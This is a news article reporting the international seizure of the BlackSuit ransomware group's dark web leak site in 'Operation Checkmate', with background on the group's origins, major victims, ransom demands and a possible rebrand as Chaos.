The notorious ransomware group BlackSuit has suffered a major blow after its dark web infrastructure was seized in an international law enforcement effort.

BlackSuit’s Websites Seized

On July 24, 2025, users attempting to access BlackSuit’s data leak portal on the dark web were greeted with a banner announcing the site’s seizure by U.S. Homeland Security Investigations (HSI). The message indicated that the takedown was part of a coordinated global investigation named “Operation Checkmate.”

Although no official statement had been issued at the time, the banner revealed the operation involved the U.S. Department of Justice (DoJ) and 16 law enforcement entities across nine countries. Among the collaborators were agencies from the United Kingdom, Ukraine, and Latvia, as well as Europol and the cybersecurity company Bitdefender.

Who Is BlackSuit? A Legacy of Cybercrime

BlackSuit emerged in May 2023, but security researchers believe it to be a rebrand of the Royal ransomware group, which itself was a successor to the infamous Conti gang.

Conti operated aggressively from 2019 to 2022, launching high-impact attacks such as the Costa Rican government breach in 2022. When Conti dissolved, its affiliates splintered into new operations, with one faction forming Royal, responsible for the City of Dallas attack in May 2023.

Soon after, Royal introduced a new encryptor and rebranded as BlackSuit, distinguishing itself by not operating under a Ransomware-as-a-Service (RaaS) model. BlackSuit’s attacks are believed to be executed solely by its internal members.

Major Attacks and Financial Demands

Since its formation, BlackSuit has claimed responsibility for 184 cyberattacks, including high-profile incidents:

• Octapharma Plasma (April 2024) — Operations at over 160 donation centers were disrupted.
• CDK Global (June 2024) — A ransomware attack caused widespread system outages across 15,000 North American auto dealerships, with damages reportedly reaching $1 billion.
• Additional victims include ZooTampa, the Brazilian government, and Western Municipal Construction.

The group is known for using double extortion tactics— encrypting files while simultaneously threatening to publish stolen data. BlackSuit also leverages legitimate Remote Monitoring and Management (RMM) tools to maintain access to compromised systems.

According to the CISA advisory (August 2024), their ransom demands typically ranged between $1M and $10M, with the highest noted demand at $60M. In just two years, BlackSuit is believed to have demanded over $500M from victims.

From BlackSuit to Chaos?

While the takedown marks a significant disruption, it appears no arrests have been made so far. Cybersecurity experts from Cisco Talos suggest that a new ransomware group called Chaos may be a rebrand or continuation of BlackSuit operations.

Talos highlighted shared tactics, tools, and procedures (TTPs) between Chaos and BlackSuit, including similarities in encryption techniques, ransom notes, and use of LOLbins and RMM software.

International Cooperation in Cybercrime Enforcement

Agencies reportedly involved in Operation Checkmate include:

• U.S. Secret Service
• Dutch National Police
• German Federal Criminal Police
• UK National Crime Agency (NCA)
• Frankfurt Prosecutor’s Office
• Ukrainian Cyber Police

While neither the NCA nor the DoJ has formally confirmed details, the seizure of BlackSuit’s infrastructure marks a strong signal of growing global coordination against ransomware actors.

Source: https://www.infosecurity-magazine.com/news/blacksuit-ransomware-sites-seized